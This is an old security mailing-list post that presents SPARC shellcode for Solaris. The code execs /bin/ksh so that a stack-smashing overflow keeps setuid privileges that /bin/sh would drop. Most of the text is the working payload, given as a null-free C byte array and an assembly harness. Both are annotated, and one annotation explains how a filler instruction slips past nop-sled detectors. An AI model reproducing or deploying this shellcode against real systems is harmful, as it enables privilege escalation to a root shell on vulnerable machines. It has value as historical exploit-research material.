
/bin/ksh sparc code


From: zomo () home serome co kr (Kichang Yang)
Date: Tue, 3 Dec 1996 20:22:22 +0900


 It seems that the "smashing the stack" attack (the term is borrowed from
Aleph1's article) is the hottest topic on bugtraq these days
(except for the symlink-to-/.rhosts attack, of course).

 If I remember correctly, the sparc code that appeared on bugtraq
does something like execl("/bin/sh","sh",0), and you know,
Solaris 2.4 /bin/sh does setuid(getuid()) unless "-p" is specified,
so it's kinda useless when it comes to attacking setuid'ed files.

 So, I made sparc code for doing something *like* execl("/bin/ksh","ksh",0).
I know it's no big deal, almost close to lame, but I think it's kinda
useful. You might like to check out Aleph1's article that appeared (or will
appear?) in Phrack 49.

 I tested it on sun4d and I'm not sure it would work on other architectures.

Bye.

-- ksh.sparc.code.c
/* 0xac15a16e is the encoding of "or %l6, 0x16e, %l6" -- the second word of
 * ksh_sparc_shellcode below.  The name suggests it is meant as a filler
 * word in place of the architectural SPARC nop (0x01000000): it contains
 * no zero byte and re-executing it is harmless (it only rewrites %l6, which
 * the payload sets again anyway).
 * Detection note: sled scanners keyed on the canonical 0x01000000 nop will
 * not see runs of this word; detection should key on the payload body. */
#define SPARC_NOP       0xac15a16e

/*
 * Raw SPARC machine code (Solaris; the post says sun4d-tested), one 32-bit
 * big-endian instruction per string piece.  It corresponds word-for-word to
 * the sethi .. ta 8 run in ksh.sparc.s below; the decoded mnemonic is noted
 * on each line.  No byte in the buffer is 0x00, which is why the author
 * spells "%sp -> %o0" as an and, and the zeroing as xor, instead of mov/clr
 * (those encodings carry zero bytes).
 */
char ksh_sparc_shellcode[] =
        "\x2d\x0b\xd8\x9a"      /* sethi %hi(0x2f626800), %l6                  */
        "\xac\x15\xa1\x6e"      /* or    %l6, 0x16e, %l6   ; %l6 = "/bin"       */
        "\x2f\x0b\xda\xdc"      /* sethi %hi(0x2f6b7000), %l7                  */
        "\xae\x15\xe3\x68"      /* or    %l7, 0x368, %l7   ; %l7 = "/ksh"       */
        "\x90\x0b\x80\x0e"      /* and   %sp, %sp, %o0     ; %o0 = %sp (path)   */
        "\x92\x03\xa0\x0c"      /* add   %sp, 12, %o1      ; %o1 = argv         */
        "\x94\x1a\x80\x0a"      /* xor   %o2, %o2, %o2     ; %o2 = 0 (envp)     */
        "\x9c\x03\xa0\x14"      /* add   %sp, 20, %sp      ; negative offsets below */
        "\xec\x3b\xbf\xec"      /* std   %l6, [%sp - 20]   ; "/bin/ksh"         */
        "\xc0\x23\xbf\xf4"      /* st    %g0, [%sp - 12]   ; NUL terminator     */
        "\xdc\x23\xbf\xf8"      /* st    %sp, [%sp - 8]    ; argv[0] = %sp      */
        "\xc0\x23\xbf\xfc"      /* st    %g0, [%sp - 4]    ; argv[1] = NULL     */
        "\x82\x10\x20\x3b"      /* mov   0x3b, %g1         ; SYS_execve         */
        "\x91\xd0\x20\x08"      /* ta    8                 ; syscall trap       */
        "\x90\x1b\xc0\x0f"      /* xor   %o7, %o7, %o0     ; %o0 = 0            */
        "\x82\x10\x20\x01"      /* mov   1, %g1            ; SYS_exit           */
        "\x91\xd0\x20\x08";     /* ta    8                 ; syscall trap       */
-- ksh.sparc.s
! ksh.sparc.s -- test harness for the payload above (Solaris/SPARC, Sun as
! syntax; "!" starts a comment).  main() prints a banner through printf and
! then falls straight into the payload instructions, which build "/bin/ksh\0"
! on the stack and issue the execve (0x3b) and exit (1) system traps.
! These are analysis notes only; every instruction word is unchanged.
.section ".data1"
.align 4
.L16:
.ascii "ksh.sparc.code goes\n\0"        ! banner printed before the payload runs
.section ".text"
.global main
main:
save %sp, -96, %sp                      ! new register window, minimum frame
set .L16,%o0                            ! %o0 = &banner
call printf,1                           ! ",1" presumably the Sun as out-register count annotation
nop                                     ! branch delay slot
        ! ---- payload begins here.  Register roles:
        !   %l6:%l7 = "/bin/ksh" as two big-endian words
        !   %o0 = path, %o1 = argv, %o2 = envp, %g1 = syscall number
        ! and/xor are used instead of mov/clr, presumably to keep zero bytes
        ! out of the encoding (see the C byte array).
        sethi   %hi(0x2f626800), %l6
        or      %l6, 0x16e, %l6         ! %l6 = 0x2f62696e = "/bin"
        sethi   %hi(0x2f6b7000), %l7
        or      %l7, 0x368, %l7         ! %l7 = 0x2f6b7368 = "/ksh"
        and     %sp, %sp, %o0           ! %o0 = %sp; the path string is stored there below
        add     %sp, 12, %o1            ! %o1 = %sp+12 = argv (two slots written below)
        xor     %o2, %o2, %o2           ! %o2 = 0 (envp = NULL)
        add     %sp, 20, %sp            ! advance %sp so the stores use negative offsets
        std     %l6, [%sp - 20]         ! [old %sp + 0..7]  = "/bin/ksh"
        st      %g0, [%sp - 12]         ! [old %sp + 8]     = 0, NUL-terminates the path
        st      %sp, [%sp - 8]          ! [old %sp + 12]    = argv[0] = adjusted %sp itself,
                                        !   NOT a pointer to the string -- whatever sits at
                                        !   that address is what the process is named; hence
                                        !   the post's "*like* execl"
        st      %g0, [%sp - 4]          ! [old %sp + 16]    = argv[1] = NULL
        mov     0x3b, %g1               ! %g1 = 0x3b = SYS_execve on Solaris
        ta      8                       ! system-call trap: execve(%o0, %o1, %o2)
        xor     %o7, %o7, %o0           ! %o0 = 0; only reached if execve returned (failed)
        mov     1, %g1                  ! %g1 = 1 = SYS_exit
        ta      8                       ! exit(0)
restore                                 ! not reached: exit does not return
--


